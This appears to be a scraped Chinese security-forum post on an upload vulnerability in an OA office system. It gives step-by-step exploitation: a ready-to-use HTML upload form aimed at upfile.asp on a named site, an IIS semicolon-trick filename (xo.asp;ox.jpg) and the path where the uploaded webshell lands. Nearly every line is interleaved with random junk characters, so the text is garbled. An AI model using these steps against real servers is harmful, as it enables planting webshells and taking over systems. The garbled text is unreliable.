全能OA办公系统 上传漏洞9 A# k3 O4 q* @+ a! r& F% X
0 I# H, P. M2 t7 s: e* \, ]5 R7 ~& o
系统介绍:4 U5 [1 e8 }) Q7 V( \
! \4 m/ C/ ?! {& S3 P全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
9 \% Z4 Q9 J; I' f, {& s4 [ h. a- j( B
主要功能:
% C# b9 h) ~0 p0 Q# X# B公司通告
7 \) p# R0 X4 C5 r5 ^4 d' J/ w9 M工作计划
" A2 ]# Z3 I5 |通讯助理 + {) [( i. w+ H+ z$ N
客户资源 8 D1 C3 g1 K8 `' |
我的公文
1 h' N( d1 Y: {* m* [公文传阅
, l$ m0 D* m& c/ U+ B& J公共资源
! N& B; i9 w7 h- }5 j8 U资源预约 7 [3 s# b" I# {# k
今日考勤
5 ~! L* O H* t8 |3 H个人计划 9 n `/ v5 L9 T' r5 p- _: ^6 u/ N
个人通讯录
' V) t" E2 J% Z个人基本档案 9 { J( v, {0 t) k. ^
未读邮件
. @- y; Y7 |; k5 X+ H发邮件 : {5 e$ O# D2 ]* y6 I2 q9 b
收件夹
9 Y- f3 ?7 j% _, ~寄件夹 ; w: A( u- Z/ Y; f1 f
网络硬盘 ) ], n# @# P" R* W: i$ x
网络会议 q, [0 X' E3 J/ l, e+ t% T! s. x
网络调查 ! z6 M( N9 r3 J& p. n( F
交流论坛5 ^/ X& R. G b( A
1 I6 Y5 b& q) t有兴趣测试的朋友可以下源码看看
2 s3 f3 R0 ]0 T. R( Q. p
4 k. j+ Z3 W5 z4 E0 n( g源码下载:
( X1 Z- \8 G/ o' ?7 H% k
6 @, [2 X0 \3 u0 X+ S/ bhttp://www.mycodes.net/30/4750.htm3 y& d: r o* F' S
8 `, s8 J. B; m9 J$ U* ]# J. B
漏洞介绍:
! ^# ~% t, L7 O! ]
8 M8 I- S& m: e0 W0 q9 h由upfile.asp上传文件漏洞引起* P; @! i U8 |8 p- [% M" K7 o/ r
2 o& l* x3 B3 r* I9 F测试方法:2 E! F* t$ T- p0 O: o
1 y! Z( [/ B5 C3 j* N. R6 x使用名小子上传http://www.itlynn.com/upfile.asp即可
3 { ]' E- u; o: X8 ]4 x, G+ j/ [8 ^5 [3 W8 J
如果upfile.asp文件被删除不存在。
7 D) l: ]$ |6 |/ r% l* u$ F' _ k5 t8 X" g5 H! c
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。) _: Q- a i, s, C
% S! V4 {5 k5 F& I) g" I如果存在那么将如下代码保存为upfile.html。
7 t! C, [- D, I+ h; ~! J- H0 A
+ i; g N; s) E然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
! x5 b7 q$ d( S6 ] s4 X2 ^$ C A% b/ J- J$ t' g
5 k6 B% T. B0 i% n) q0 W
. L+ ~ w4 F) Y- p4 @5 v7 p/ b01 <table border='0' align="center" cellpadding="5">
& O0 F3 q& t' V4 g. T! r b! _
- u$ F; T4 z7 w3 ?+ h4 e8 r02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> % ]) C) Q% V: m$ W5 t+ W/ d
* K$ M6 ~% F) `. z2 q1 A: W03 <tr> 9 k$ a$ J7 k% V" X0 ~* n6 y2 i
8 v! X3 Z- O6 o7 U04 <td>报错:</td> , E& G0 j5 ^' e' x1 ]
9 `7 @" e# k; _1 V) m05 <td><input type='radio' name='errnumber' value='0'>
( G$ D4 _! m+ A. @* I; r4 D1 D0 [5 ?9 E1 P0 i
06 自动更名 , T3 v8 L5 m1 r
2 O& m ^4 e' ^% E" q2 w
07 <input type='radio' name='errnumber' value='1' checked>
5 j1 l" ~& E" G* i5 x% u" M5 `. K/ U4 b2 \
08 报错方式
9 \9 Z" U4 }8 f: A8 H7 y9 d- W# t- E8 J6 G l
09 <input type='radio' name='errnumber' value='2'>
( c. l9 ^2 ^+ Z4 r6 s" o* g* \
% R1 g8 g. h" T$ Q; t/ y9 e! F- }% s10 直接覆盖</td> ' B+ f! v; L& I+ B. _4 Q+ U
3 A% h. |. y+ g0 a) M$ B4 G. \0 B( I11 </tr> & d* b1 N+ J5 L, D2 V
6 l8 ?1 E2 K i B1 S3 @/ U4 \12 <tr> 5 L6 `6 V8 t: ?% N
+ P" W! ?4 a2 t" T
13 <td>主题:</td> + W* G b5 W5 D" ]8 G2 _ X1 G
, [% e1 \; B0 ]' M# q3 n
14 <td><input type='text' name='filename' size='30'></td> ) F9 G0 M; w) Z3 M& v
* M# D. L+ |/ m15 </tr>
" `* x/ \0 o4 \- w( u
3 t: c5 q- Z( J+ e9 L16 <tr> 4 s0 ~2 O0 k& }, Q# y V
) v. }! ?$ V% k* {* |& w17 <td>文件:</td> 0 v5 A: |0 _5 m& |& h# ^ }2 d
& |' t. W% D3 R, z4 n3 n
18 <td><input type="file"name="fruit"size="30"></td>
. x' V/ `9 A( ?0 i0 I2 u8 d2 K
% D7 d. {& ^( h6 A4 `* x19 </tr> 1 m8 a; E- J- f- c( \7 T2 R9 N
# y$ L* i* E* u c6 v
20 <tr> 4 m5 I2 t7 Q3 m* w3 q; j& R) O
% o9 l; d/ X5 L; x6 H' ^: f
21 <td valign='top'>简介:</td> + y% \- q* [9 u: J
' V8 f) j; O1 X" t22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 4 v, D# ^- J# V$ _
2 Y4 U, g5 P" T1 f: j. d+ t( W23 </tr>
* M& n% `; o5 V7 @; m
$ H$ O# q# Y5 Q" J, w24
: L& G8 d. N- I( h9 C" H4 Q
; D& R' K4 |( i% A4 P25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 4 V0 W' G0 E3 \' X! a5 m# `# I$ B
* U6 i! n, I9 _0 J
26 </tr>
! `: \) Z6 L! A# ^4 z- M7 Y; Z& y) S) M+ `3 J
27 </form>
5 J5 U& K, ~1 l9 I( f
2 \6 r- _. D. D; @* I然后打开上传一个文件名为xo.asp;ox.jpg的文件。0 H2 p( t! l& \
7 L, z n. y9 n! t/ m" P8 J 7 A2 ]. W" |) F; Q3 |
5 u+ m9 `% d4 \& g+ W
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
) F( n6 R4 Y3 Y/ `) Z1 G" E% D. m$ J5 r* K. M/ x: j
此漏洞需要配合解析漏洞利用。; {( z3 e9 f% m! `
7 Z9 ?% G/ g- R- R5 W |